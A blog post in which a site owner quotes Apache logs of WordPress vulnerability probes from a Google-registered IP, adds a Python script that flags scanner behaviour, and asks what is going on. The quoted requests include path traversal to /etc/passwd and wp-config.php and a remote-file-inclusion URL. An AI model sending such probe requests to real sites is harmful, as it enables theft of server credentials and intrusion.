WTF?! Is Google trying to hack WordPress sites??

Looking through the Apache access logs of one of my WordPress installations the other day, I noticed these entries:

35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"

First of all: all these logged requests are coming from IP address 35.198.55.156 which is reported by Whois ARIN as belonging to Google Inc, Mountain View, USA.

Now, notice the first log entry accessing /robots.txt, which seems perfectly fine. Especially since it's Google, right? But then again, the User-Agent is marked as “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32”, which is not any of the usual Google crawler User-Agents. Besides, it says “Windows NT 10.0” and “OPR/36.0.2130.32” (Opera 36 browser as reported by whatismybrowser.com) in there.

Then come the weird attempts that follow in the few seconds immediately after that first entry, trying to access files and locations that do not exist, like /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js, /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php (what? trying to access a very hacky file on another site through mine?), /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php or even /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd (seriously? trying to download the server passwd file?!)… this is very disturbing.
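The observations above (a browser User-Agent rather than a crawler one, a burst of requests within a few seconds, probes of plugin paths that do not exist, `../` traversal, `/etc/passwd` and `wp-config.php` in parameters, and a parameter pointing at a URL on another host) can be turned into a small triage script. The following is an added example, not part of the original post: it parses Apache access-log lines in the format shown above, groups them per client IP and flags the indicators. The sample lines are constructed from a subset of the entries in the post plus one made-up benign visitor (203.0.113.7 is a documentation address); the thresholds and flag names are my own choices.

```python
"""Triage Apache access-log lines for vulnerability-scanner behaviour (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache line as it appears in the post: ip vhost - [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

UA = ('Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
      '(KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32')

# Constructed sample: five of the post's lines plus one benign visitor (hypothetical).
SAMPLE_LOG = "\n".join([
    f'35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "{UA}"',
    f'35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "{UA}"',
    f'35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "{UA}"',
    f'35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "{UA}"',
    f'35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "{UA}"',
    f'203.0.113.7 xxxxxx.xxxzxx.com - [19/Sep/2017:09:12:00 +0200] "GET /2017/09/some-post/ HTTP/1.1" 200 8812 "-" "{UA}"',
])

TRAVERSAL = re.compile(r'(?:^|[/?&=])\.\.(?:/|%2f|$)', re.I)      # ../ in path or query
REMOTE_URL = re.compile(r'[?&][^=&]+=https?://', re.I)            # parameter pointing at another host
SENSITIVE = re.compile(r'/etc/passwd|wp-config\.php', re.I)       # files no web client should ask for


def parse(line):
    """Return the parsed fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def request_indicators(target):
    """Indicators found in a single request target (path plus query string)."""
    found = set()
    if TRAVERSAL.search(target):
        found.add("traversal")
    if REMOTE_URL.search(target):
        found.add("remote_url_param")
    if SENSITIVE.search(target):
        found.add("sensitive_file")
    return found


def triage(log_text, burst_window=30, burst_min=5):
    """Group lines per client IP and summarise scanner indicators for each one.

    A client is called a scanner when two or more independent indicators fire;
    the thresholds are illustrative, not tuned for any particular site."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in per_ip.items():
        times = sorted(datetime.strptime(r["time"], "%d/%b/%Y:%H:%M:%S %z") for r in recs)
        span = (times[-1] - times[0]).total_seconds()
        flags = set()
        for r in recs:
            flags |= request_indicators(r["target"])
        # Repeated errors under /wp-content/plugins/ means the client is guessing at
        # plugins that are not installed, the fingerprint of a canned WordPress scanner.
        plugin_errors = sum(1 for r in recs
                            if r["target"].startswith("/wp-content/plugins/") and int(r["status"]) >= 400)
        if plugin_errors >= 2:
            flags.add("plugin_probing")
        if len(recs) >= burst_min and span <= burst_window:
            flags.add("burst")
        # A real Google crawler identifies itself as Googlebot; Google documents that the
        # check is a reverse DNS lookup of the IP (googlebot.com / google.com) and a forward
        # lookup back, which needs the network and is not done here. A desktop-browser UA
        # cannot pass that check regardless of the owner of the IP block.
        claims_googlebot = any("Googlebot" in r["ua"] for r in recs)
        report[ip] = {
            "requests": len(recs), "span_s": span, "plugin_errors": plugin_errors,
            "claims_googlebot": claims_googlebot, "flags": flags,
            "verdict": "scanner" if len(flags) >= 2 else "benign",
        }
    return report


if __name__ == "__main__":
    for ip, summary in triage(SAMPLE_LOG).items():
        print(ip, summary["verdict"], sorted(summary["flags"]))
```

Run against the constructed sample, the script reports 35.198.55.156 as a scanner with all five flags and 203.0.113.7 as benign. The cloud owner of an IP block says nothing about who is driving the requests; the behaviour in the log does.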

Is Google scanning for vulnerabilities which it would then kindly announce to me when any would be found? I’ve never heard that before… Is this coming from one of their employees who came in with his/her own Window$ (obviously) laptop, unaware of the fact it has a bot running in the background? Seems unlikely to be using that specific Opera user agent… Or are they actually trying to hack my application?

I reported the incident to Google and hope — but don’t expect — to hear more from them soon!

Does anybody know what could be going on here?
